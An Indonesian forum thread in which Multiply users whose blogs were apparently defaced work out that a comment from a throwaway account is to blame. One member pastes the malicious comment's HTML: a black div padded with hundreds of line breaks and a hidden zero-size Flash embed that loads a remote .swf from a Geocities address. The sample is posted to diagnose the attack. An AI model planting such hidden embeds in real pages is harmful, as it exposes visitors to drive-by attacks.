kali ketiganya multiply gue dihack orang ... setan !!!

[anjingjablay]

halo teman teman ...
multiply gue dihack orang nih, jadi gak bisa ngebuka mysite ... apalagi ngereply reply comment gitu ...
dan ternyata bukan cuman gua, tapi temen temen gua juga ngalamin dihack dengan gejala yang sama ...
gimana ya cara benerinnya
gua udah kontak customer servicenya multiply, tapi masih blom ada jawaban ampe sekarang ... hiks
    

[Xammy]

halo teman teman ...
multiply gue dihack orang nih, jadi gak bisa ngebuka mysite ... apalagi ngereply reply comment gitu ...
dan ternyata bukan cuman gua, tapi temen temen gua juga ngalamin dihack dengan gejala yang sama ...
gimana ya cara benerinnya
gua udah kontak customer servicenya multiply, tapi masih blom ada jawaban ampe sekarang ... hiks
    

di hack gimana nih? account/password masih aman gak?
gue ga tau multiply gimana, tapi ngeliat bebasnya konten yg bisa di share, bisa aja ada script2 yang di inject misalnya javascript, ajax, atau php/asp

[franhealy]

biasanya emang gitu ndre, agak lama dijawabnya karena mereka lagi nyetak di atas hadiahnya tulisan,

Selamat sdr.andre atas keberhasilannya di hack 3 kali.
Love, Multiply.

tunggu aja ndre. nanti juga bakal surprise elo dapet apa. hehe.

*alah gua gak ngebantu...* 

[anjingjablay]

di hack gimana nih? account/password masih aman gak?
gue ga tau multiply gimana, tapi ngeliat bebasnya konten yg bisa di share, bisa aja ada script2 yang di inject misalnya javascript, ajax, atau php/asp

jadi masuk inbox masih bisa kebuka, cuman gak tau itu passwordnya masih aman atau udah keinfeksi ...
trus gua liat di inbox ada beberapa reply buat postingan gue sama buat guestbook ... seperti biasa gua klik itu open in a new window ... yg ada malahan langsung blank semua ... trus coba klik mysite, malahan keluar tulisan tulisan gak jelas gitu ... setan deh tuh
dan ternyata beberapa teman gua di multiply juga kena hal yang sama persis ... jadi berarti pelakunya satu orang cracker psikopat ... karena kalo berasal dari spammer guestbook, gak mungkin soalnya spammer sifat penyebarannya random sedangkan ini ngehacknya melokalisir ... korbannya gue, beberapa temen temen gue, dan beberapa kolega dari temen temen gue di mp ... itu yang kena hack ... sial deh
    

[Xammy]

kayaknya gue tau dimana masalahnya tuh...
coba aja lu buka postingan lu yang soal FPI,
tiap buka itu firefox gue langsung ketutup, padahal gue baru liat sekilas source-nya.
dia masukin div tag, tapi kayaknya lebih dr itu.

coba browse dengan javascript di disabled

edit:
baru dapet full sourcenya, ada yang embed swf di reply postingan lu itu yang mengarah kesini:
http://www.geocities.com/jxflashc/dr2.swf

gue coba masuk kesitu, tapi ga tau itu aslinya atau udah di deface, jadinya masuk kesini:
http://www.geocities.com/akatsuk110/

disitu lebih parah lagi javascriptnya, cuma karena FF gue disabled javascript, jadi ga ngaruh apa2

[kéiysz]

kerjaannya orang FPI?

hehehe .. iseng banget



============================================

edit:

gue bisa masuk, Ndre. bisa liat postingan yang dimaksud Xammy, tapi emang ga mau komen. dan bener kata Xammy, ada postingan reply itu (alamat .swf)

btw, .. yang dibilang Xammy ninggalin source itu si orang ini: http://uasuki.multiply.com/


so, here goes the story :
orang itu baca postingan loe (salah sendiri selalu dibikin 'everyone'. hahaha) entah darimana, lalu masuk ke MP loe (atau mungkin langsung browse di gugel, masuk ke MP loe). kebetulan di situ ada komen dari temen loe yang lain. ya kan? .. nah, dia ninggalin komen di postingan yang itu, kemudian lompat-lompat lagi lari ke MP temen loe yang lain yang komen di postingan loe tadi.

gitu ceritanya.
masuk akal kan kenapa hack-nya hanya terbatas ke elo dan temen-temen loe aja? ..


accountnya kosong. kayaknya emang sengaja dibikin untuk iseng ngacak-ngacak.

hehehehee..

[kéiysz]

nih, sourcenya ..
silakan dihajar.

.. dipelajari, maksudnya. hehehe..

Code:

<a name=reply5></a><div id="reply_karonkeren:journal:304+5" class="reply replyboxodd replybox"><div class=dummy><table width='100%' border=0 cellpadding=0 cellspacing=0><tr valign=top><td class=userboxlogo width=55><a onclick='popup_miniprofile(this.parentNode, "uasuki", 0, 0, ""); return false;' href='http://uasuki.multiply.com'><img border=0 width=50 height=50 alt='uasuki' src='http://images.uasuki.multiply.com/logo'></a></td><td><div class=replybody><div class=actionlinks>

<a href="/item/reply/karonkeren:journal:304+5?xurl=http%3A%2F%2Fkaronkeren.multiply.com%2Fjournal%2Fitem%2F304" class="reply_link" id="reply_link_karonkeren:journal:304+5" onclick="reply_to(event)">reply</a></div><div class=replyboxstamp><a href=http://uasuki.multiply.com>uasuki</a> wrote on Jun 9</div><div class="replybodytext"><div class="replybodytext" id="reply_body_karonkeren:journal:304+5" author="uasuki" author_possessive="uasuki's"><br><br><div id="Layer1" style="border: 1px none rgb(0, 0, 0); z-index: 1; left: 0px; width: 200; top: 10px; height: 200; background-color: Black; "><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19<br><br>,0" width="0" height="0"><param name="allowScriptAccess" value="never"><br>    <param name="movie" value="http://www.geocities.com/jxflashc/dr2.swf" /=""><br>    <param name="quality" value="high" /=""><br>    <embed allowscriptaccess="never" src="http://www.geocities.com/jxflashc/dr2.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="1" height="1"><br>  </object><br><br></div></div></div></div></td></tr></table></div></div><div id=new_replies_go_here><!-- --></div></div><script language="JavaScript" type="text/javascript">
<!--
var replies_count = 6; live_replies = 1; var replies_order = '';
//-->
</script>

[denial]

wah kodja jadi jago baca2 script ginih..
turut prihatin buat andre. coba aja delete commentnya, bisa kagak..

btw, cara ngapus guestbook di multiply gimana sih?

[kéiysz]

wah kodja jadi jago baca2 script ginih..

btw, cara ngapus guestbook di multiply gimana sih?

timbang kopi-pes doank kali, Is.. hwahahahaa..

ngapus guestbook gimana maksudnya?
ngapus entry di dalem guestbooknya apa mau ngilangin guestbook dari tampilan utama MPnya?

kalo ga mau nampilin guestbook di main page mah di-setting dari main setting aja bisa. tapi dari link URL nya tetep bisa di-load juga guestbooknya, misal di http://inimultiplysaya.multiply.com/guestbook <--- gini.

[denial]

bukan, cara ngapus entry guestbooknya. masa ada yg isi guestbook gw iklan alat2 bantu sih.. wakakakakka